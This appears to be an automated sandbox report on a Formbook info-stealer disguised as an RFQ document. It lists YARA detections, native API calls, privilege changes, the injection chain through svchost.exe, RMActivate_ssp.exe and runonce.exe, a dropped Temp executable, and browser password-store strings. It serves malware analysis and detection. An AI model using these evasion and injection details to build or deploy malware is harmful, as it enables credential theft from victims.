              System Summary

              barindex
              Source: 1.2.svchost.exe.2500000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 13.2.xl9lsbb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 13.2.xl9lsbb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 1.2.svchost.exe.2500000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000001.00000002.1749592251.0000000002500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000E.00000002.4104203005.0000000006D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000F.00000002.4101074559.0000000000630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000F.00000002.4103858952.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000F.00000002.4103945476.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000D.00000002.3649278175.0000000005330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000D.00000002.3649137742.00000000016B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000001.00000002.1750132612.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000001.00000002.1749816358.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000003.00000002.4104107521.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000D.00000002.3647567861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000010.00000002.4103523467.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000002.00000002.4103630939.0000000003A30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000003.00000002.4101142200.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000003.00000002.4104284280.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000005.00000002.4105348256.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 11.2.xl9lsbb.exe.6ef0000.4.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
              Source: 11.2.xl9lsbb.exe.2aac2e8.1.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: This is a third-party compiled AutoIt script.0_2_00E73B4C
              Source: RFQ - MK FMHS.RFQ.24.101.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8aa8cb6b-7
              Source: RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e24066ef-9
              Source: RFQ - MK FMHS.RFQ.24.101.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0400af05-b
              Source: RFQ - MK FMHS.RFQ.24.101.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8c773c53-9
              Source: initial sampleStatic PE information: Filename: RFQ - MK FMHS.RFQ.24.101.exe
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0252B003 NtClose,1_2_0252B003
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72B60 NtClose,LdrInitializeThunk,1_2_02F72B60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_02F72DF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F735C0 NtCreateMutant,LdrInitializeThunk,1_2_02F735C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F74340 NtSetContextThread,1_2_02F74340
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F74650 NtSuspendThread,1_2_02F74650
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AF0 NtWriteFile,1_2_02F72AF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AD0 NtReadFile,1_2_02F72AD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AB0 NtWaitForSingleObject,1_2_02F72AB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BF0 NtAllocateVirtualMemory,1_2_02F72BF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BE0 NtQueryValueKey,1_2_02F72BE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BA0 NtEnumerateValueKey,1_2_02F72BA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72B80 NtQueryInformationFile,1_2_02F72B80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72EE0 NtQueueApcThread,1_2_02F72EE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72EA0 NtAdjustPrivilegesToken,1_2_02F72EA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72E80 NtReadVirtualMemory,1_2_02F72E80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72E30 NtWriteVirtualMemory,1_2_02F72E30
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72FE0 NtCreateFile
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72FB0 NtResumeThread
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72FA0 NtQuerySection
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72F90 NtProtectVirtualMemory
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72F60 NtCreateProcessEx
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72F30 NtCreateSection
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72CF0 NtOpenProcess
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72CC0 NtQueryVirtualMemory
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72CA0 NtQueryInformationToken
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72C70 NtFreeVirtualMemory
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72C60 NtCreateKey
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72C00 NtQueryInformationProcess
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72DD0 NtDelayExecution
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72DB0 NtEnumerateKey
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72D30 NtUnmapViewOfSection
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72D10 NtMapViewOfSection
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F72D00 NtSetInformationFile
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F73090 NtSetValueKey
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F73010 NtOpenDirectoryObject
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F739B0 NtGetContextThread
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F73D70 NtOpenThread
               Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F73D10 NtOpenProcessToken
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A44340 NtSetContextThread, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A44650 NtSuspendThread, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42BA0 NtEnumerateValueKey, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42BE0 NtQueryValueKey, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42BF0 NtAllocateVirtualMemory, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42B60 NtClose, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42AF0 NtWriteFile, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42AD0 NtReadFile, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42FB0 NtResumeThread, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42FE0 NtCreateFile, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42F30 NtCreateSection, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42E80 NtReadVirtualMemory, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42EE0 NtQueueApcThread, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42DF0 NtQuerySystemInformation, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42DD0 NtDelayExecution, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42D30 NtUnmapViewOfSection, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42D10 NtMapViewOfSection, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42CA0 NtQueryInformationToken, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42C60 NtCreateKey, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42C70 NtFreeVirtualMemory, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A435C0 NtCreateMutant, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A439B0 NtGetContextThread, LdrInitializeThunk
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42B80 NtQueryInformationFile
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42AB0 NtWaitForSingleObject
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42FA0 NtQuerySection
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42F90 NtProtectVirtualMemory
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42F60 NtCreateProcessEx
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42EA0 NtAdjustPrivilegesToken
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42E30 NtWriteVirtualMemory
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42DB0 NtEnumerateKey
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42D00 NtSetInformationFile
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42CF0 NtOpenProcess
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42CC0 NtQueryVirtualMemory
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A42C00 NtQueryInformationProcess
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A43090 NtSetValueKey
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A43010 NtOpenDirectoryObject
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A43D10 NtOpenProcessToken
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_03A43D70 NtOpenThread
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_02FC7BE0 NtDeleteFile
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_02FC7B00 NtReadFile
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_02FC79A0 NtCreateFile
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_02FC7C70 NtClose
               Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_02FC7DC0 NtAllocateVirtualMemory
               Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: 0_2_00ED40B1: CreateFileW, _memset, DeviceIoControl, CloseHandle
               Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: 0_2_00EC8858 _memset, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcscpy, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock
               Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: 0_2_00ED545F ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState
              Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 02F87E54 appears 107 times
              Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 02FAEA12 appears 86 times
              Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 02FBF290 appears 103 times
              Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 02F75130 appears 58 times
              Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 02F2B970 appears 262 times
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: String function: 00E77F41 appears 35 times
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: String function: 00E90D27 appears 70 times
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: String function: 00E98B40 appears 42 times
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: String function: 03A8F290 appears 103 times
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: String function: 039FB970 appears 262 times
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: String function: 03A45130 appears 58 times
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: String function: 03A7EA12 appears 86 times
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: String function: 03A57E54 appears 107 times
              Source: RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000003.1637308145.0000000003E43000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ - MK FMHS.RFQ.24.101.exe
              Source: RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000003.1638208217.0000000003FED000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ - MK FMHS.RFQ.24.101.exe
              Source: RFQ - MK FMHS.RFQ.24.101.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 1.2.svchost.exe.2500000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 13.2.xl9lsbb.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
              Source: 13.2.xl9lsbb.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
              Source: 1.2.svchost.exe.2500000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
              Source: 00000001.00000002.1749592251.0000000002500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
              Source: 0000000E.00000002.4104203005.0000000006D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
              Source: 0000000F.00000002.4101074559.0000000000630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
              Source: 0000000F.00000002.4103858952.00000000043C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
              Source: 0000000F.00000002.4103945476.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
              Source: 0000000D.00000002.3649278175.0000000005330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
              Source: 0000000D.00000002.3649137742.00000000016B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
              Source: 00000001.00000002.1750132612.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
              Source: 00000001.00000002.1749816358.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
              Source: 00000003.00000002.4104107521.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
              Source: 0000000D.00000002.3647567861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
              Source: 00000010.00000002.4103523467.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
              Source: 00000002.00000002.4103630939.0000000003A30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
              Source: 00000003.00000002.4101142200.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
              Source: 00000003.00000002.4104284280.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
              Source: 00000005.00000002.4105348256.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
              Source: VT3g2PdlLRVpwBp[1].exe.3.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: xl9lsbb.exe.3.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, cT2WNlVPnBAMr77NOs.cs Security API names: _0020.SetAccessControl
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, cT2WNlVPnBAMr77NOs.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, cT2WNlVPnBAMr77NOs.cs Security API names: _0020.AddAccessRule
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, FbDRsRoUK8rESGYi11.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, cT2WNlVPnBAMr77NOs.cs Security API names: _0020.SetAccessControl
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, cT2WNlVPnBAMr77NOs.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, cT2WNlVPnBAMr77NOs.cs Security API names: _0020.AddAccessRule
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, FbDRsRoUK8rESGYi11.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, FbDRsRoUK8rESGYi11.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, cT2WNlVPnBAMr77NOs.cs Security API names: _0020.SetAccessControl
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, cT2WNlVPnBAMr77NOs.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, cT2WNlVPnBAMr77NOs.cs Security API names: _0020.AddAccessRule
              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/9@16/10
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: 0_2_00EDA2D5 GetLastError,FormatMessageW
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: 0_2_00EC8713 AdjustTokenPrivileges,CloseHandle
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: 0_2_00EC8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: 0_2_00EDB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: 0_2_00EEF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: 0_2_00EE86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: 0_2_00E74FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Mutant created: NULL
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe File created: C:\Users\user\AppData\Local\Temp\autC7F3.tmp
              Source: RFQ - MK FMHS.RFQ.24.101.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: RMActivate_ssp.exe, 00000003.00000003.1924110044.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1923913670.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4101608329.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3826521155.0000000000996000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4101900693.0000000000996000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: RFQ - MK FMHS.RFQ.24.101.exe ReversingLabs: Detection: 36%
              Source: RFQ - MK FMHS.RFQ.24.101.exe Virustotal: Detection: 36%
              Source: unknown Process created: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe"
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe"
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe Process created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Process created: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe "C:\Users\user\AppData\Local\Temp\xl9lsbb.exe"
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Process created: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe "C:\Users\user\AppData\Local\Temp\xl9lsbb.exe"
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe Process created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
              Source: C:\Windows\SysWOW64\runonce.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Sections loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, ntmarta.dll
